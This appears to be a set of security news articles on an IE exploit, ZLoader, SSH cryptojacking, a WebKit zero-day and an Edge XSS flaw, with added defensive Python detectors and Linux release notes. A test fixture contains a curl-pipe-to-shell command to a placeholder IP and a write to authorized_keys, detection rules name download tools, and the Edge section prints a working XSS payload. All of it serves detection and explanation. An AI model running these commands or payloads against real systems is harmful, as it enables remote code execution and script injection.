Internet Explorer, Microsoft's legacy browser, was recently exploited by attackers to deliver a VBA-based remote access Trojan (RAT) capable of accessing and downloading files stored on targeted Windows systems and of executing further malicious payloads.

According to researchers at Malwarebytes Labs, a suspicious document named "Манифест.docx" ("Manifest.docx") was discovered that downloads and executes two templates: one is macro-enabled, the other an HTML object containing an Internet Explorer exploit.

Both templates are loaded through remote template injection; the second carries the IE exploit (CVE-2021-26411), a vulnerability previously used by the Lazarus APT, and both paths end in the same full-featured Remote Access Trojan.

How Hackers Exploited the IE Bug to Deploy VBA Malware on Targeted Windows Systems

The unidentified attackers rely on remote template injection: the document's settings.xml.rels points at a remote template containing a full-featured VBA RAT that collects victim information, executes shellcode, and reads disk and file-system information.

The shellcode from the IE exploit, once executed, deploys the same VBA RAT that the macro template loads. After loading the remote templates, the malicious document displays a Russian-language decoy purporting to be a statement from a group within Crimea opposed to Russia.

The remote template contains Document_Open and Document_Close procedures, which run automatically when the document is opened and closed. The VBA RAT can also identify antivirus products running on the target system, and it executes commands received from the attacker-controlled server.
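Added example (not code from the Malwarebytes report or from the malicious document): a Python check for the injection technique described above. Word records an attached template as a relationship in word/_rels/settings.xml.rels and other remote parts in word/_rels/document.xml.rels; a relationship with TargetMode="External" pointing at an http(s) URL is what makes Word fetch a remote template on open. The script builds a small .docx-like archive in memory (a constructed sample, not the real Манифест.docx), reports such relationships and any embedded vbaProject.bin, and treats a local file:// template as benign. The URL and file names are placeholders.

```python
"""Flag .docx files that pull a remote template (remote template injection).

Added example, not code from the Malwarebytes report. Builds a constructed
.docx-like zip in memory so it runs offline, then inspects the relationship
parts Word consults when opening a document.
"""
import io
import zipfile
import xml.etree.ElementTree as ET

RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
ATTACHED_TEMPLATE = (
    "http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate"
)
# Relationship parts worth inspecting inside a .docx
RELS_PARTS = ("word/_rels/settings.xml.rels", "word/_rels/document.xml.rels")


def external_relationships(docx_bytes):
    """Return (part, relationship type, target) for every external http(s) relationship,
    plus a marker entry if a VBA project is embedded."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        names = set(zf.namelist())
        for part in RELS_PARTS:
            if part not in names:
                continue
            root = ET.fromstring(zf.read(part))
            for rel in root.iter(f"{{{RELS_NS}}}Relationship"):
                target = rel.get("Target", "")
                if rel.get("TargetMode") == "External" and target.lower().startswith(
                    ("http://", "https://")
                ):
                    rel_type = rel.get("Type", "").rsplit("/", 1)[-1]
                    findings.append((part, rel_type, target))
        if "word/vbaProject.bin" in names:  # macro-enabled content travelling in the file
            findings.append(("word/vbaProject.bin", "vbaProject", ""))
    return findings


def is_suspicious(docx_bytes):
    return bool(external_relationships(docx_bytes))


def build_docx(settings_rels_xml, with_vba=False):
    """Construct a minimal .docx-like archive containing only the parts the check reads."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<w:document/>")
        zf.writestr("word/_rels/settings.xml.rels", settings_rels_xml)
        if with_vba:
            zf.writestr("word/vbaProject.bin", b"\x00")
    return buf.getvalue()


# Constructed sample: attachedTemplate relationship pointing at a remote server
MALICIOUS_SETTINGS_RELS = f"""<?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="{RELS_NS}">
  <Relationship Id="rId1" Type="{ATTACHED_TEMPLATE}"
    Target="http://example.invalid/template.dotm" TargetMode="External"/>
</Relationships>"""

# Constructed sample: the usual local Normal.dotm, which is not a finding
BENIGN_SETTINGS_RELS = f"""<?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="{RELS_NS}">
  <Relationship Id="rId1" Type="{ATTACHED_TEMPLATE}"
    Target="file:///C:/Users/me/AppData/Roaming/Microsoft/Templates/Normal.dotm"
    TargetMode="External"/>
</Relationships>"""

if __name__ == "__main__":
    for label, rels in (("malicious", MALICIOUS_SETTINGS_RELS), ("benign", BENIGN_SETTINGS_RELS)):
        print(label, external_relationships(build_docx(rels)))
```

Run it against a real file with `external_relationships(open(path, "rb").read())`. Only http(s) targets are reported because a local attachedTemplate is normal for any document created from a template.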

How to Mitigate against the Microsoft IE Bug?



Microsoft released a patch for the IE bug (CVE-2021-26411) as part of its March 2021 Patch Tuesday updates, and users are advised to install it. Because the exploit here is delivered through an Office document rather than by browsing with IE, using a different default browser does not help; only the patch does.

Among the other issues addressed by that update were the ProxyLogon flaws (CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 and CVE-2021-27065), which allowed attackers to break into Microsoft Exchange servers and install web shells for long-term access.

Microsoft IE Bug exploited by Hackers to deploy VBA Malware

Package Hunter is a free and open-source tool from GitLab that installs a project's dependencies in a sandbox environment and monitors them for unexpected behavior, reporting anomalies that may indicate malicious code.

Dependencies are supposed to be thoroughly vetted before being included in a program, but that is rarely feasible in practice given the sheer volume of dependency code needing review and the lack of tools to help with it.

Package Hunter is therefore a useful addition to the supply-chain toolbox, as threat actors increasingly use public package registries as a distribution channel for malicious code.

How GitLab’s Package Hunter Will Detect Malicious Code?



Package Hunter analyzes a program's dependencies by installing them in a sandbox and watching what they do; suspicious system calls are reported to the developer for further examination.

It integrates with GitLab CI and has been in use internally to test GitLab's own dependencies since November 2020; currently it supports NodeJS modules and Ruby Gems. The aim is to let other projects detect malicious code in their dependencies before harm is done, increasing confidence in open-source supply chains.

Developers build quickly by reusing third-party code on the implicit "trust" that each dependency needs no separate review; Package Hunter puts a check behind that trust.
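As an added example (not Package Hunter's own code), the triage step sketched in Python: a few rules run over a constructed trace of events recorded while a dependency installs. The event field names, the install root and the set of expected registry hosts are assumptions; Package Hunter itself collects such events from a sandbox (it builds on Falco), and a rule set like this is what turns raw system calls into the "suspicious" report the developer sees.

```python
"""Rule-based triage of syscall events captured while installing a dependency.

Added example, not Package Hunter's code. Runs over a constructed event list;
the field names (evt, proc, host, path, argv) are an assumed schema.
"""

INSTALL_ROOT = "/sandbox/node_modules"          # where a clean install may write (assumed)
REGISTRY_HOSTS = {"registry.npmjs.org", "rubygems.org"}  # hosts an install may contact (assumed)
SHELLS = {"sh", "bash", "dash", "zsh"}
DOWNLOADERS = {"curl", "wget", "nc"}


def _outside_install_root(path):
    return not path.startswith(INSTALL_ROOT + "/")


def triage_event(ev):
    """Return a finding string for a suspicious event, or None."""
    kind = ev["evt"]
    if kind == "connect":
        host = ev.get("host") or ""
        if host not in REGISTRY_HOSTS:
            dest = host or ev.get("ip")
            return f"network: {ev['proc']} connected to {dest}:{ev.get('port')}"
    elif kind in ("open_write", "rename"):
        if _outside_install_root(ev["path"]):
            return f"filesystem: {ev['proc']} wrote {ev['path']} outside {INSTALL_ROOT}"
    elif kind == "execve":
        argv = ev["argv"]
        if argv and argv[0] in SHELLS and "-c" in argv:
            return f"process: {ev['proc']} spawned shell: {' '.join(argv)}"
        if argv and argv[0] in DOWNLOADERS:
            return f"process: download tool launched: {' '.join(argv)}"
    return None


def triage(events):
    """All findings for a trace, in event order."""
    return [f for f in (triage_event(e) for e in events) if f]


# Constructed trace of an `npm install` where the package has a malicious postinstall script
SAMPLE_EVENTS = [
    {"evt": "connect", "proc": "npm", "host": "registry.npmjs.org", "port": 443},
    {"evt": "open_write", "proc": "npm", "path": "/sandbox/node_modules/left-pad/index.js"},
    {"evt": "execve", "proc": "node", "argv": ["node", "postinstall.js"]},
    {"evt": "execve", "proc": "node", "argv": ["sh", "-c", "curl -s http://203.0.113.9/x | sh"]},
    {"evt": "connect", "proc": "curl", "host": "", "ip": "203.0.113.9", "port": 80},
    {"evt": "open_write", "proc": "sh", "path": "/home/ci/.ssh/authorized_keys"},
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(finding)
```

The first three events are what a legitimate install looks like and produce nothing; the shell spawn, the connection to a bare IP and the write to authorized_keys are each reported separately so a reviewer can see the chain.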

How to get started with GitLab's Package Hunter?



Package Hunter is currently available as a free and open-source project on GitLab, and if you wish to get started, use the GitLab CI template to add a job to your project and follow the instructions for setting up a Package Hunter server.

Note that Package Hunter currently supports only NodeJS modules and Ruby Gems; refer to the official documentation for technical details.

GitLab Package Hunter detects Malicious code in dependency package

DuckDuckGo's Email Protection feature allows users to create an alias email address that strips the trackers embedded in many email messages.

DuckDuckGo emphasizes protecting web searchers' privacy and avoiding the filter bubble of personalized results; it distinguishes itself from other search engines by not profiling users and by showing the same results to everyone for a given query.

Its foray into email protection brings the same privacy standard to email: users get addresses on the duck.com domain, owned by DuckDuckGo itself, such as xyz@duck.com.

How DuckDuckGo Email Protection works?



DuckDuckGo Email Protection is launching into beta, as a new feature in its apps that will protect users' email privacy without having them switch email services.



Users generate unique private addresses of the form name@duck.com in the DuckDuckGo app or browser extension. Email sent to such an address has its trackers removed and is automatically forwarded to the user's regular inbox; DuckDuckGo states that it does not save the email.

Whether you use Gmail, Yahoo or another provider, mail sent to your private Duck Address arrives in your normal inbox, so you read it as you normally do, in an app or on the web.

How to Join the private beta waitlist?



Email Protection has been released into beta; access requires joining the private waitlist.

The process is straightforward: download DuckDuckGo for iOS or Android, open Settings > Beta Features > Email Protection and tap "Join the Private Waitlist." Once you have a Personal Duck Address, DuckDuckGo says it will support it long-term, so you can share it with confidence.

DuckDuckGo Email Protection helps to Block Email Trackers

An active cryptojacking campaign is targeting Linux machines with weak SSH credentials; the attackers' main goal is to deploy Monero-mining malware, although their toolbox would allow other attacks.

According to the Bitdefender researchers who discovered the campaign, it has been active since at least 2020 and is attributed to a threat group likely based in Romania. The attackers break into Linux systems using a previously undocumented SSH brute-forcer written in Go, dubbed "Diicot brute", a password-cracking tool that appears to be offered on a software-as-a-service model.

The notable part is not the brute-forcing itself but that the attackers do it in a way designed to avoid detection.

How the Linux Cryptojacking Attackers target Linux Systems?



Exploiting weak SSH credentials on Linux systems is nothing new; what sets this group apart is that it obfuscates its Bash scripts by compiling them with the shell script compiler (shc) and uses Discord webhooks to report information back.

The toolkit also includes conventional scanners such as masscan and zmap. Because the brute-forcer is distributed as a service, each operator supplies their own API key in their scripts, and like most tools in the kit it mixes Romanian and English in its interface.

Once the attackers find a Linux host with weak SSH credentials, they deploy and execute a loader; the current campaign uses .93joshua, though others such as .purrple and .black exist. All the loaders are obfuscated with shc. The loader gathers system information and relays it to the attackers with an HTTP POST to a Discord webhook.

There is no shortage of Linux machines with weak SSH credentials, and attackers find them by mass scanning.

As mitigation, runtime cloud security is recommended as a last line of defense for catching malicious code and other post-exploitation activity. The first line is simpler: disable SSH password authentication in favor of keys, do not allow root login over SSH, and rate-limit or block sources with repeated failed logins so that brute-forcing is both noisy and ineffective.
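An added example, not part of the Bitdefender research: a Python detector for the brute-force stage, run over constructed sshd log lines. It counts failed password attempts per source address in a sliding window and, more usefully, reports any address that logs in successfully after crossing the threshold, which is what a successful "Diicot brute" run looks like from the victim's side. The log lines, the year (syslog timestamps carry none), the window and the threshold are assumptions to tune for your environment.

```python
"""Spot SSH password brute-forcing, and brute-forcing that succeeded, in sshd logs.

Added example, not from the Bitdefender report. Parses constructed
syslog-style sshd lines; window, threshold and year are assumptions.
"""
import re
from collections import defaultdict, deque
from datetime import datetime

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<status>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\S+) port \d+"
)
YEAR = 2021            # assumed: syslog timestamps have no year
WINDOW_SECONDS = 300   # failures older than this no longer count
THRESHOLD = 5          # failures within the window that mark a brute-forcer


def parse(line):
    """Return (timestamp, status, user, ip) for a password auth line, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{YEAR} {m['ts']}", "%Y %b %d %H:%M:%S")
    return ts, m["status"], m["user"], m["ip"]


def analyse(lines):
    """Return (brute_forcers, compromised): source IPs that crossed the threshold,
    and a map of those IPs to the account they subsequently logged into."""
    failures = defaultdict(deque)   # ip -> timestamps of failures inside the window
    brute_forcers, compromised = set(), {}
    for line in lines:
        rec = parse(line)
        if rec is None:
            continue
        ts, status, user, ip = rec
        q = failures[ip]
        while q and (ts - q[0]).total_seconds() > WINDOW_SECONDS:
            q.popleft()
        if status == "Failed":
            q.append(ts)
            if len(q) >= THRESHOLD:
                brute_forcers.add(ip)
        elif ip in brute_forcers:   # Accepted after a burst of failures
            compromised[ip] = user
    return brute_forcers, compromised


# Constructed sample log: one brute-force that succeeds, one user typo, one key login
SAMPLE_LOG = """\
Jul 15 10:00:01 host1 sshd[2001]: Failed password for invalid user admin from 198.51.100.7 port 50211 ssh2
Jul 15 10:00:03 host1 sshd[2002]: Failed password for root from 198.51.100.7 port 50212 ssh2
Jul 15 10:00:05 host1 sshd[2003]: Failed password for invalid user oracle from 198.51.100.7 port 50213 ssh2
Jul 15 10:00:07 host1 sshd[2004]: Failed password for root from 198.51.100.7 port 50214 ssh2
Jul 15 10:00:09 host1 sshd[2005]: Failed password for root from 198.51.100.7 port 50215 ssh2
Jul 15 10:00:11 host1 sshd[2006]: Accepted password for root from 198.51.100.7 port 50216 ssh2
Jul 15 10:01:00 host1 sshd[2007]: Failed password for alice from 192.0.2.33 port 41000 ssh2
Jul 15 10:01:20 host1 sshd[2008]: Accepted password for alice from 192.0.2.33 port 41001 ssh2
Jul 15 10:02:00 host1 sshd[2009]: Accepted publickey for bob from 192.0.2.44 port 42000 ssh2: ED25519 SHA256:abc
""".splitlines()

if __name__ == "__main__":
    brute, owned = analyse(SAMPLE_LOG)
    print("brute-forcing sources:", sorted(brute))
    print("successful logins after brute-force:", owned)
```

On a real host, feed it `/var/log/auth.log` or `journalctl -u ssh --no-pager`. The "compromised" set is the one to act on immediately: a source that guessed its way in is also the source that will drop the shc-packed loader next.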

Cryptojacking Campaign targeting Linux Systems on the Rise

Google's threat intelligence researchers discovered four zero-day exploits used in three different campaigns, affecting major browsers including Chrome, Internet Explorer and Apple Safari.

The WebKit (Safari) zero-day, tracked as CVE-2021-1879, is a use-after-free in QuickTimePluginReplacement; it was discovered on March 19, 2021, and exploited by a likely Russian government-backed actor.

The campaign against Apple iOS devices coincided with campaigns by the same actor against Windows users that aimed to deliver Cobalt Strike, a commercial remote access and adversary-simulation tool frequently abused in targeted attacks.

How the Apple WebKit Zero-day was exploited in the wild?



The Apple WebKit zero-day was exploited in the wild by attackers who used LinkedIn Messaging to send specially crafted malicious links to government officials from Western European countries.

When a target opened the link from an iOS device, it redirected to an attacker-controlled domain that served the next-stage payloads. After several validation checks to confirm the iOS device was real rather than an analysis environment, the final payload exploiting CVE-2021-1879 was served.

The exploit turns off Same-Origin Policy protections in order to collect authentication cookies from popular websites such as Google, LinkedIn and Facebook, and sends them to an attacker-controlled IP address over a WebSocket. Not every attack needs a chain of multiple zero-days to succeed; the campaign mirrors a wave of targeted attacks attributed to the Russian group tracked as Nobelium, which was found to abuse the same vulnerability against Western government agencies.

How to Mitigate against the Apple WebKit Zero-day?



The WebKit flaw allows maliciously crafted web content to carry out a universal cross-site scripting attack, that is, script execution in the context of any site the victim's browser can reach.

Apple patched the flaw on March 26, 2021 in iOS 14.4.2 and iPadOS 14.4.2; users of affected devices should update to mitigate it.

Apple WebKit Zero-day actively exploited in the wild

The Solus team has released Solus 4.3, the latest in the Solus 4 'Fortitude' series, following version 4.2 with updated software stacks and broader hardware enablement.

Solus is an independently developed Linux distribution for x86-64 offering the homegrown Budgie desktop as well as GNOME, MATE and KDE Plasma editions. Solus 4.3 ships Linux kernel 5.13, which brings a wide range of new hardware support, including AMD GPU FreeSync/Adaptive-Sync over HDMI and the AMD Aldebaran accelerator.

Along with several bug fixes, Solus 4.3 upgrades to the GNOME 40 stack (GNOME 40.2) and fixes Budgie panel applets and Budgie's tracking of window state.



What's New in Solus 4.3 Release?



Linux kernel 5.13 adds basic support for M1-powered Apple Macs, preliminary support for Alder Lake-S GPUs, and much improved support for RISC-V, the open instruction set architecture that serves as a royalty-free alternative to the proprietary Arm designs used in smartphones.

Solus 4.3 offers these other improvements:

  • Basic Apple M1 Support
  • Preliminary Alder Lake S GPU Support
  • AMD GPU FreeSync/Adaptive-Sync HDMI support
  • AMD Aldebaran accelerator support
  • New Generic USB display driver
  • Much better RISC-V support


Solus 4.3 also carries current applications, including Firefox 89.0.2, LibreOffice 7.1.4.2 and Thunderbird 78.11.0. The flagship Budgie edition has been upgraded to Budgie 10.5.3 with many improvements.

How to Download or Upgrade to Solus 4.3



Existing Solus users receive the 4.3 packages through the regular update channel and need only apply the pending updates; no reinstall is required.

If you are new to Solus and want to try 4.3, download the ISO image from the official download page.

Solus 4.3 Release: brings new Kernel and improved Hardware support

Macro malware was common years ago because macros ran automatically when a document was opened; since Office began blocking them by default, malware authors have had to convince victims to enable macros before their code can run.

Malware authors are now devising tricks that use seemingly benign documents to disable macro security warnings before executing code. According to researchers at McAfee Labs, a novel tactic "downloads and executes malicious DLLs (ZLoader) without any malicious code present in the initial spammed attachment macro."

ZLoader infections using this mechanism begin with a phishing email carrying a Microsoft Word attachment which, once opened, downloads a password-protected Microsoft Excel file from a remote server.

How Hackers uses the New Trick to Disable Macro Warnings in Malicious Office Files?



ZLoader, a descendant of the infamous ZeuS banking trojan, primarily targeted victims in the U.S., Canada, Japan and Spain; it is known for aggressively using macro-enabled Office documents as its initial attack vector to steal personal and financial information from customers of financial institutions.

After downloading the XLS file, the Word macro reads the contents of its cells, creates a new VBA module in the same Excel file and writes the cell contents into it as macro functions. Once the macros are in place, the Word document sets the registry policy that disables Excel's macro warning and then invokes the malicious function from the Excel file, which therefore runs without a prompt.

Macros must still be enabled in the Word document to trigger the download, but by switching off the security warning for the second stage the attackers avoid a second prompt and keep all malicious code out of the initial attachment, making detection harder; their obfuscation techniques have evolved over the years.

The malware not only lures users into enabling macros but also embeds files containing XLM macros that download and execute a second-stage payload retrieved from a remote server.
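An added example (not from the McAfee analysis) of how to catch the registry step from endpoint telemetry. Excel stores the macro-warning policy as the VBAWarnings value (1 = enable all macros, 2 = disable with notification, 3 = disable except digitally signed, 4 = disable all) and programmatic access to the VBA project as AccessVBOM, both under HKCU\Software\Microsoft\Office\<version>\Excel\Security; those value names are Office's, not the page's. The Python rule below runs over constructed Sysmon Event ID 13 (registry value set) records and flags an Office process, rather than the user or Group Policy, setting either value to 1, which is exactly what a document rewriting macro policy looks like.

```python
"""Detect Office Trust Center registry tampering in Sysmon registry events.

Added example, not code from the McAfee report. Event records are
constructed; field names follow Sysmon's Event ID 13 schema.
"""
import re

# Trust Center values under HKCU\Software\Microsoft\Office\<ver>\<App>\Security
TRUST_VALUE_RE = re.compile(
    r"\\Software\\Microsoft\\Office\\(?P<ver>\d+\.\d)\\"
    r"(?P<app>Word|Excel|PowerPoint|Outlook|Access)\\Security\\"
    r"(?P<value>VBAWarnings|AccessVBOM)$",
    re.IGNORECASE,
)
OFFICE_IMAGES = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe"}
DWORD_RE = re.compile(r"DWORD \((0x[0-9a-f]+)\)", re.IGNORECASE)  # Sysmon's Details format


def dword(details):
    """Parse the integer out of a Sysmon 'DWORD (0x...)' Details string."""
    m = DWORD_RE.search(details or "")
    return int(m.group(1), 16) if m else None


def check_registry_event(ev):
    """Return a finding for a registry-value-set record touching macro policy, else None."""
    if ev.get("EventID") != 13:
        return None
    m = TRUST_VALUE_RE.search(ev.get("TargetObject", ""))
    if not m:
        return None
    image = ev.get("Image", "").rsplit("\\", 1)[-1].lower()
    name, value = m["value"], dword(ev.get("Details"))
    # VBAWarnings=1 enables all macros; AccessVBOM=1 trusts access to the VBA project
    weakening = value == 1
    if image in OFFICE_IMAGES:
        sev = "high" if weakening else "medium"
        return f"{sev}: {image} set {m['app']} {name}={value} (macro policy changed by an Office process)"
    if weakening:
        return f"medium: {image} set {m['app']} {name}={value}"
    return None


def check_all(events):
    return [f for f in map(check_registry_event, events) if f]


# Constructed Sysmon-style records: a Word document rewriting Excel's policy,
# a policy push from a system service, and an unrelated process-create event
SID = r"HKU\S-1-5-21-1111-2222-3333-1001"
WINWORD = r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
SAMPLE_EVENTS = [
    {"EventID": 13, "Image": WINWORD,
     "TargetObject": SID + r"\Software\Microsoft\Office\16.0\Excel\Security\VBAWarnings",
     "Details": "DWORD (0x00000001)"},
    {"EventID": 13, "Image": WINWORD,
     "TargetObject": SID + r"\Software\Microsoft\Office\16.0\Excel\Security\AccessVBOM",
     "Details": "DWORD (0x00000001)"},
    {"EventID": 13, "Image": r"C:\Windows\System32\svchost.exe",
     "TargetObject": SID + r"\Software\Microsoft\Office\16.0\Word\Security\VBAWarnings",
     "Details": "DWORD (0x00000004)"},   # hardening to "disable all": not a finding
    {"EventID": 1, "Image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "CommandLine": "EXCEL.EXE /automation -Embedding"},
]

if __name__ == "__main__":
    for finding in check_all(SAMPLE_EVENTS):
        print(finding)
```

Both writes by WINWORD.EXE are reported as high severity. A user changing the setting through the Trust Center UI is also an Office-process write and would surface as medium, so the rule is meant for triage rather than blocking; the AccessVBOM write is the stronger signal, since ordinary users almost never touch it.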

New Evasive Trick used by attackers to disable Macro Security Warnings

KaOS is a Linux distribution focused on Qt and KDE; its latest release, KaOS 2021.06, ships the new Plasma 5.22 with Adaptive Transparency.

Adaptive Transparency makes the panel and its widgets translucent, turning fully opaque whenever a window is maximized.

The release also brings support for JPEG XL, a successor to the JPEG format, and the Plasma Wayland session now supports Activities, letting users keep their main work separate from other tasks.

What's New in KaOS 2021.06 Release?



Besides the desktop upgrade, KaOS 2021.06 makes LibreOffice the default office suite in place of Calligra. The Plasma packages are built on Qt 5.15.2+ and comprise Plasma 5.22.2, Frameworks 5.83.0 and KDE Applications 21.04.2.

Other new and updated core tools in KaOS 2021.06 include:

  • KWin Wayland now supports the Present Windows effect
  • Maliit virtual keyboard packages added
  • Fosshost is now the default mirror, delivering content via the Fastly CDN
  • The Calamares installer offers two new QML modules
  • Plasma System Monitor replaces KSysguard

With Fosshost as the default mirror, there is no longer any need to edit a mirror list to install or update KaOS.

How to Download or Upgrade to KaOS 2021.06 Release?



Existing KaOS users can upgrade to 2021.06 with:

sudo pacman -Syu


For a fresh installation, download the ISO image from the official site. Note that the installer's welcome screen can now display text or other information from a QML file inside the Calamares window.

KaOS 2021.06 Release: Brings Plasma 5.22 with Adaptive Transparency

Microsoft Edge had a security flaw: a universal cross-site scripting (UXSS) bug triggered when translating web pages with Microsoft Translator, the browser's built-in translation feature.

UXSS exploits a vulnerability in the browser itself or in a browser extension, rather than in a particular website, to create an XSS condition that runs attacker code in the context of any site. The Edge flaw is tracked as CVE-2021-34506 with a CVSS score of 5.4; its discovery is credited to Ignacio Laurence, Vansh Devgan and Shivam Kumar Singh of CyberXplore.

Microsoft has rolled out Edge updates fixing the issue and awarded the researchers $20,000 under its bug bounty program.

How the Edge Browser Flaw Could have allowed anyone to Steal Your Private Data?



Microsoft Translator, which ships with Edge, took the text of the page to be translated without sanitizing it or converting it to plain text first, so an input such as "><img src=x onerror=alert(1)> placed in a page was handed back by the translator as HTML and its onerror handler executed as JavaScript. There was no validation step that escaped the input or turned the DOM into text before processing it for translation.

Because the translation feature did not sanitize input, an attacker who could get their text onto a page, in a comment or profile field for example, could have it execute as JavaScript when the user clicked the prompt in the address bar to translate the page.

Web-based applications from the Microsoft Store may also be exposed, since such apps ship with the same Microsoft Translator component that triggered the UXSS.
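An added example, not Microsoft's or CyberXplore's code, that models the bug class in Python: a translator walks the page's text nodes, sends each to a translation service and writes the result back. If the result is written back as markup rather than as text, a text node that merely looks like a tag becomes a real tag with a live onerror handler; escaping the result before reinsertion closes the hole. The "translation" is a two-word glossary and the DOM is Python's html.parser; both are stand-ins chosen so the example runs offline.

```python
"""Page translation that reinserts text as markup (the bug) next to the fixed form.

Added example, not Edge's or the researchers' code. Translation is a mock
glossary and the page is a constructed HTML fragment.
"""
import html
from html.parser import HTMLParser

PAYLOAD = '"><img src=x onerror=alert(1)>'   # the input CyberXplore reported
GLOSSARY = {"Hello,": "Hola,", "world": "mundo"}  # stand-in for the translation service


def mock_translate(text):
    return " ".join(GLOSSARY.get(w, w) for w in text.split(" "))


class TextCollector(HTMLParser):
    """Split a page into ('tag', markup) and ('text', data) parts so it can be rebuilt."""

    def __init__(self):
        super().__init__(convert_charrefs=True)   # text nodes arrive already unescaped
        self.parts = []

    def handle_starttag(self, tag, attrs):
        self.parts.append(("tag", self.get_starttag_text()))

    def handle_endtag(self, tag):
        self.parts.append(("tag", f"</{tag}>"))

    def handle_data(self, data):
        self.parts.append(("text", data))


def rebuild(page_html, reinsert):
    """Translate every text node and put it back using `reinsert`."""
    p = TextCollector()
    p.feed(page_html)
    p.close()
    return "".join(reinsert(mock_translate(v)) if k == "text" else v for k, v in p.parts)


def translate_vulnerable(page_html):
    # Writes the translated string back as markup (innerHTML-style): text becomes live HTML
    return rebuild(page_html, lambda s: s)


def translate_safe(page_html):
    # Writes it back as text (textContent-style): < > & " in the result are escaped
    return rebuild(page_html, html.escape)


class HandlerFinder(HTMLParser):
    """List (tag, attribute, value) for every on* event handler attribute in a page."""

    def __init__(self):
        super().__init__()
        self.handlers = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if name.lower().startswith("on"):
                self.handlers.append((tag, name, value))


def event_handlers(page_html):
    f = HandlerFinder()
    f.feed(page_html)
    f.close()
    return f.handlers


# Constructed page: the payload is stored as text, exactly as a comment field would hold it
SAMPLE_PAGE = f"<p>Hello, world</p><p>{html.escape(PAYLOAD)}</p>"

if __name__ == "__main__":
    print("vulnerable:", translate_vulnerable(SAMPLE_PAGE))
    print("handlers  :", event_handlers(translate_vulnerable(SAMPLE_PAGE)))
    print("safe      :", translate_safe(SAMPLE_PAGE))
    print("handlers  :", event_handlers(translate_safe(SAMPLE_PAGE)))
```

The untranslated page contains no img element at all; only the vulnerable round trip creates one, which is why the fix belongs at the reinsertion step and not at the input.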

What Edge Browser users Need to do Right away



Microsoft fixed the issue in Edge version 91.0.864.59, now available.

Edge users should update promptly by opening Settings and more > About Microsoft Edge (edge://settings/help), which triggers the update if it has not already been applied automatically.

Edge Browser flaw exposes users Personal Data to any website